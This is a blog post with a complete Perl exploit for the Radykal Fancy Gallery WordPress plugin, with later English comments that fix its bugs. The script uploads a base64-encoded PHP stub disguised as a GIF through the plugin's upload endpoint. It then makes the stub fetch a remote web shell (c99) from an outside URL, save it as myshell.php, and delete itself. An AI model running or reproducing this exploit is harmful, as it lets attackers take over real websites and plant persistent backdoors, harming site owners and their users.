Senin, 16 Juli 2012

[PERL] Exploit Radykal Fancy Gallery

#!/usr/bin/perl

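# Banner printed before any prompt.
# Single-quoted heredoc on purpose: the original used double-quoted strings,
# so "jefry@anaski.net" interpolated the (empty) array @anaski and the contact
# line actually printed as "jefry.net". Everything else is byte-identical.
print <<'BANNER';
################################################################
                Radykal Fancy Gallery Exploit
 Author   : Jefry AnasKi
 Contact  : jefry@anaski.net
 Homepage : www.anaski.net | blog.anaski.net
 Thank to :
             BlueBoyz, AnasKi CreW, ExploreCrew
################################################################
BANNER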

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;                          
use LWP 5.64;
use LWP::UserAgent;
use Socket;                                  
use IO::Socket;                              
use IO::Socket::INET;                      
use IO::Select;   
use MIME::Base64;
use Cwd 'abs_path';
# Clear the terminal. Both commands are tried in order (clear, then cls);
# whichever does not exist on this OS simply fails and the result is ignored,
# exactly as before.
system($_) for qw(clear cls);

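# Prompt for the target's WordPress base URL (the example ends in '/').
print "\r\nmasukan url target \r\n";
print "ex : http://blog.anaski.net/\r\n";
print "==> ";
my $web = <STDIN>;
die "no target url given\n" unless defined $web;
# chomp, not chop: chop removed the last character unconditionally, which
# eats a real character when the input has no trailing newline. Also strip a
# stray CR (Windows console) and trailing slashes so the plugin path below is
# not joined with a double '/'.
chomp($web);
$web =~ s/\r\z//;
$web =~ s{/+\z}{};
# Upload endpoint of the Radykal Fancy Gallery plugin, relative to the
# WordPress root. The later blocks derive the admin directory from this.
my $url = $web."/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php";
# Base64 of the file that will be uploaded. Decoded, it is a GIF89a header
# followed by a short PHP stub: copy() of whatever URL arrives in ?url= to
# "myshell.php" (relative to the PHP process' working directory, so
# presumably next to the stub — and it relies on PHP being allowed to open
# remote URLs), and self-deletion via unlink(__FILE__) when called with
# ?act=del. Kept verbatim. It is written to exp.php in the CURRENT DIRECTORY
# and nothing in this script removes that file afterwards.
my $shell = "R0lGODlhAT8BPz8/P////yH5BAE/Pz8/LD8/Pz8BPwE/PwICRAE/Oz88P3BocA0KICAgICAgICAgICAgJHNoeCA9IEAkX0dFVFsidXJsIl07DQoJCQlAY29weSgiJHNoeCIsIm15c2hlbGwucGhwIik7DQoJaWYgKEAkX0dFVFsnYWN0J109PSAnZGVsJyl7ICAgDQogICAgICAgIGlmICh1bmxpbmsoX19GSUxFX18pKSB7IEBvYl9jbGVhbigpOyBlY2hvICI8YnIvPkpGcnlfIFdhcyBIZXJlISI7IH0NCiAgICAgICAgZWxzZSB7IGVjaG8gIjxjZW50ZXI+PGI+Q2FuJ3QgZGVsZXRlICIuX19GSUxFX18uIiE8L2I+PC9jZW50ZXI+IjsgfQ0KICB9DQo/Pg";
my $sh = decode_base64($shell);
# Three-arg open on a lexical handle, checked on both open and close: the
# original bareword 2-arg open was never checked, so a write failure would
# silently upload an empty or stale exp.php. binmode keeps the GIF header and
# CRLFs inside the payload untouched on platforms that translate newlines.
open(my $code, '>', 'exp.php') or die "cannot write exp.php: $!\n";
binmode($code);
print {$code} $sh;
close($code) or die "cannot close exp.php: $!\n";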

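# One user agent for the upload; the mobile-Opera UA string is cosmetic.
my $ua = LWP::UserAgent->new;
$ua->agent("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54)");
# The timeout has to be set BEFORE the request is made; the original set it
# after ->post had already returned, so the upload could hang indefinitely.
$ua->timeout(7);
# multipart/form-data POST of the local exp.php as field "file[]". The whole
# response (status line + headers + body) is kept as text because the checks
# below are plain regexes over it, as in the original.
my $res = $ua->post($url, "Content" => ["file[]" => ["exp.php"]], 'Content_Type' => 'form-data');
my $get = $res->as_string;

if ($get =~ /error":0/) {
    # Upload accepted: ask for the URL the uploaded stub should fetch.
    print "\r\nmasukan url shell \r\n";
    print "ex : http://anaski.net/tool/c99.txt\r\n";
    print "==> ";
    my $hasil = <STDIN>;
    die "no shell url given\n" unless defined $hasil;
    chomp($hasil);          # chomp, not chop (see the target prompt above)
    $hasil =~ s/\r\z//;
    # $urlx: path of the stored upload as reported in the response body.
    # NOTE(review): the capture is greedy and the value is not JSON-unescaped
    # (a "\/" would be passed through literally), so this only works when the
    # plugin reports a plain relative path — confirm against a real response.
    my ($urlx) = ($get =~ /realFile":"(.*)"}/);
    die "upload reported success but no realFile in response\n" unless defined $urlx;
    # $exp: the plugin's admin directory (everything before image-upload.php,
    # trailing '/' included).
    my ($exp) = ($url =~ /(.*)image-upload.php/);
    # $hasil is appended to the query string unencoded, as before; a value
    # containing '&' or '#' would be truncated by the target.
    openweb($exp.$urlx."?&url=".$hasil);
    openweb($exp.$urlx."?&act=del");
    # NOTE(review): this prints $exp with a second '/', and the stub's copy()
    # wrote "myshell.php" relative to the PHP process' working directory,
    # which need not be $exp — treat the printed location as a guess.
    print "\r\nhasil ==> ".$exp."/myshell.php\r\n";
} elsif ($get =~ /"error":1/) {
    print "File exp.php is not an image";
} else {
    print "Silahkan Cari Target Lain";
    # Surface the HTTP status on stderr so a connection/timeout failure is
    # distinguishable from a genuinely unaffected target.
    warn "\n(".$res->status_line.")\n";
}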



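# openweb($url): GET $url and return the raw (undecoded) response body.
# Called twice after a successful upload — once to make the stub pull the
# real shell, once to make it delete itself.
#
# Fixes relative to the original:
#  * it declared an empty prototype "()" while being called with one argument
#    (only tolerated because the call sites precede this definition and used
#    the prototype-bypassing &openweb form); the prototype is dropped.
#  * it passed an undeclared $uagent (undef) to the constructor, so these
#    GETs went out with LWP's default agent string rather than the Opera
#    string used for the upload; the same string is set explicitly here.
#    (The undeclared variable would also have been a compile error under
#    `use strict`.)
sub openweb {
    my ($url) = @_;
    my $ua = LWP::UserAgent->new;
    $ua->agent("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54)");
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}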
 
Referensi (reference): http://forum.explorecrew.org/index.php?topic=1166.0